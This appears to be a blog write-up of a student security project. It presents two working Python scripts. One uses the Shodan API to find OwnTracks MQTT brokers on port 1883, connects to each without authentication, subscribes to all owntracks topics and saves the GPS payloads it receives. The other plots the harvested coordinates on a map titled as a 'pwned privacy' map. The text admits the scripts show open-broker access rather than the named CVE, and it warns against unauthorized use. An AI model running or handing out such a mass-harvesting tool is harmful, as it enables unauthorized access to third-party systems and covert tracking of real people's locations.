Previously I was working on a university minor project (an IPS for IoT devices), and I picked CVE-2017-7650 to write a Snort rule for it. While thinking about how someone could leverage this seemingly minor vulnerability, I asked myself what kind of data in the current IoT space can compromise a user's privacy. Yes, it is GPS data. I am a big fan of Python and wanted to use its power, so I wrote two small Python scripts. The first gathers a list of IP addresses from the Shodan API and tries to connect to each of them as an MQTT client. If the connection is established successfully (this happens because no authentication or ACL is configured on those brokers), the script subscribes to all OwnTracks topics (`owntracks/#`) and stores the received GPS data in a .json file, which the second script then plots on a map. Note that, as published, the script connects with the fixed client id "MqttClient" and no username, so it never sends the `#`/`+` client id or username that CVE-2017-7650 (the Mosquitto pattern-ACL bypass, fixed in 1.4.12) relies on; what it actually demonstrates is unauthenticated access to open brokers rather than the CVE itself. Also be aware that connecting to and subscribing on brokers you do not own or have written authorization to test is unauthorized access in most jurisdictions, and the location data collected is personal data — use these scripts only against your own infrastructure or within a sanctioned engagement.

mqtt-owntracks-pwn.py

import paho.mqtt.client as mqtt
import shodan
import time
import os, sys, socket

#Some house cleaning: clear the terminal before any results are printed.
#Windows uses 'cls'; every other platform is assumed to have 'clear'.
_clear_cmd = 'cls' if sys.platform == "win32" else 'clear'
os.system(_clear_cmd)

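#Shodan API config
#Sign up for a new account at https://www.shodan.io (if you are a university student,
#register with your university mail id to get a fully featured account for free) and
#export the key as the SHODAN_API_KEY environment variable. Reading it from the
#environment keeps the secret out of the source file and out of version control;
#the empty-string default only preserves the old "paste it here" workflow.
SHODAN_API_KEY = os.environ.get("SHODAN_API_KEY", "")
if not SHODAN_API_KEY:
    # Fail early with a clear message instead of an opaque Shodan API error at search time.
    sys.exit("[-] SHODAN_API_KEY is not set; export it before running this script")
shodan_api = shodan.Shodan(SHODAN_API_KEY)
# Hosts Shodan has seen answering MQTT on 1883 with an OwnTracks banner.
results = shodan_api.search("owntracks port:1883")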


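def on_connect(client, userdata, flags, rc):
    """paho-mqtt connect callback: subscribe to every OwnTracks topic once the broker accepts us.

    paho invokes this callback for every CONNACK, including refusals, so the
    result code has to be checked before the session is treated as usable;
    the original subscribed (and reported success) unconditionally.

    Args:
        client: the paho ``Client`` that connected.
        userdata: user data set on the client (unused).
        flags: CONNACK flags from the broker (unused).
        rc: CONNACK result code; 0 means the broker accepted the connection,
            any other value is a refusal (e.g. 5 = not authorized).
    """
    if rc != 0:
        # Refused connection: nothing to subscribe to, and "Connection successful" would be wrong.
        print('[-] Connection refused by broker (rc=%s)' % rc)
        return
    print("[+] Connection successful")
    # '#' is the multi-level wildcard, so this asks for every topic under owntracks/.
    # Whether the broker actually grants it is reported via on_subscribe, not here.
    client.subscribe('owntracks/#', qos = 1)        # Subscribe to all topics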

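def on_message(client, userdata, msg):
    """paho-mqtt message callback: print each OwnTracks payload and append it to the capture file.

    On Python 3 ``msg.payload`` is ``bytes`` (``str`` on Python 2), so the
    original ``msg.payload != ""`` comparison was always true on Python 3 and
    the file would have received ``b'...'`` reprs. Truthiness handles both
    types, and the payload is decoded (with replacement) before writing so the
    file holds plain JSON text, which is what the mapping script's
    ``json.loads`` expects.

    Args:
        client: the paho ``Client`` (unused).
        userdata: user data set on the client (unused).
        msg: the ``MQTTMessage``; only ``topic`` and ``payload`` are read.
    """
    if not msg.payload:
        # An empty payload is typically a retained-message clear, not evidence that the
        # broker is patched; the message text is kept as-is for compatibility.
        print('Device is not vulnerable')
        return
    payload = msg.payload
    if not isinstance(payload, str):
        payload = payload.decode('utf-8', 'replace')
    print ('[+] Topic: %s \n[+] Message: %s \n' % (msg.topic, payload))
    # The payload comes from an untrusted broker: it is stored verbatim, one
    # message per line, and only ever parsed (never executed) by the mapping script.
    # A payload containing a newline would span two lines in the file.
    with open('CVE-2017-7650_owntracks_geodata.json', 'a+') as f:
        f.write("%s\n" % (payload))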

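# Single client reused for every host; callbacks above do the subscribing and capturing.
client = mqtt.Client(client_id = "MqttClient")
client.on_connect = on_connect
client.on_message = on_message

CAPTURE_FILE = 'CVE-2017-7650_owntracks_geodata.json'
# Make sure the capture file exists even if no broker ever delivers a message, so
# gps-location-mapper.py can open it. The original re-opened/closed it per host.
open(CAPTURE_FILE, 'a').close()

for result in results['matches']:
    ip_addr = result['ip_str']
    # Printed before the connection attempt, so it announces the target rather than actual data.
    print('[+] Data recieved from: ' + ip_addr + '\n\n\n')
    try:
        # Plaintext MQTT on 1883, 60 s keepalive. connect() raises socket.error
        # (an alias of OSError on Python 3) for unreachable or refusing hosts.
        client.connect(ip_addr, 1883, 60)
    except socket.error:
        # 'except socket.error, e:' was Python 2 only syntax and 'e' was never used.
        print('[+] Error could not connect to ' + ip_addr)
        continue
    # Drive the network loop in a background thread for a fixed window, then tear
    # down before moving to the next host.
    client.loop_start()
    time.sleep(6)
    client.loop_stop()
    client.disconnect()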

    # Author: CJHackerz

gps-location-mapper.py

import folium
import json
from time import sleep


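geo_map = folium.Map(location=[0, 0],
    zoom_start=3
)

# Only lines that parse as a JSON object with numeric, in-range 'lat'/'lon'
# become markers. Everything else (encrypted OwnTracks payloads, non-location
# message types, non-JSON lines, malformed numbers) is skipped instead of
# crashing the run; the original only caught KeyError, so a single non-JSON
# line raised out of the loop.
with open('CVE-2017-7650_owntracks_geodata.json', 'r') as json_file:

    #Iterating through json objects in each new line
    for data in json_file:
        if not data.strip():
            continue  # tolerate blank lines in the capture file
        try:
            geo_data = json.loads(data)
            # float() rejects anything that is not a number. The values came from an
            # untrusted broker and end up interpolated into the generated page's
            # JavaScript, so only plain floats are allowed through.
            lat = float(geo_data['lat'])
            lon = float(geo_data['lon'])
        except (ValueError, KeyError, TypeError):
            # ValueError: not JSON / not a number; KeyError: no lat/lon (e.g. an
            # encrypted payload); TypeError: JSON was not an object (list, number, null).
            continue
        # Out-of-range (or NaN, which fails both comparisons) coordinates are skipped.
        if not (-90.0 <= lat <= 90.0 and -180.0 <= lon <= 180.0):
            continue
        folium.Marker([lat, lon]).add_to(geo_map)

geo_map.save('pwned_privacy_map.html')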